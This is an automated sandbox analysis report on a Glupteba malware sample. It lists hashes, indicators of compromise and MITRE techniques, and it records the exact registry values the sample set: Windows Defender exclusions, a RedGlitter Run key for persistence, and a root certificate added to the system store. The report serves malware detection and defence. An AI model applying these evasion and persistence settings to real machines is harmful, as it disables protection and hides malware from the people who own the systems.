glupteba | 869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37

General

Target

869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Size

3.9MB
MD5

fca1d24ce1db0281ac1c6cdd76fb0882
SHA1

89164a3660a20bc0bbaa2af28a0c9455a77ee04d
SHA256

869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37
SHA512

3a993568d878b22e91e4b17b1283ad3a82263cb01b8dc7e7a66a061d46941f2a4267f439942eaed7ee2123ac6c5e04095627dc43e077e681379fc50abfb1cc4e
SSDEEP

98304:zRgH8qwvzLOxmw8uzYoeEoYWODF45CJYhXj:2H8qIOxmuJeiDaEyX

Score

10^/10

glupteba metasploit backdoor discovery dropper evasion loader persistence trojan

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 9 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1496-56-0x0000000001190000-0x0000000001995000-memory.dmp	family_glupteba
behavioral1/memory/1496-57-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba
behavioral1/memory/1496-58-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba
behavioral1/memory/1496-59-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba
behavioral1/memory/532-64-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba
behavioral1/memory/532-66-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba
behavioral1/memory/532-72-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba
behavioral1/memory/812-74-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba
behavioral1/memory/812-76-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Windows security bypass 2 TTPs 10 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe = "0"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\RedGlitter = "0"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe

Executes dropped EXE 2 IoCs

Processes:

csrss.exepatch.exe

pid process

812 csrss.exe
1652 patch.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

1824 netsh.exe

pid	process
812	csrss.exe
1652	patch.exe

pid	process
1824	netsh.exe

Loads dropped DLL 3 IoCs

Processes:

869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe

pid	process
532	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
532	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
860

Windows security modification 2 TTPs 10 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\RedGlitter = "0"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe = "0"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Windows\CurrentVersion\Run\RedGlitter = "\"C:\\Windows\\rss\\csrss.exe\""	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in Windows directory 3 IoCs

Processes:

869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exemakecab.exe

description	ioc	process
File opened for modification	C:\Windows\rss	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
File created	C:\Windows\rss\csrss.exe	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
File created	C:\Windows\Logs\CBS\CbsPersist_20230129193343.cab	makecab.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1620 schtasks.exe
1676 schtasks.exe

pid	process
1620	schtasks.exe
1676	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.execsrss.exenetsh.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time"	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe

Modifies system certificate store 2 TTPs 7 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

csrss.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
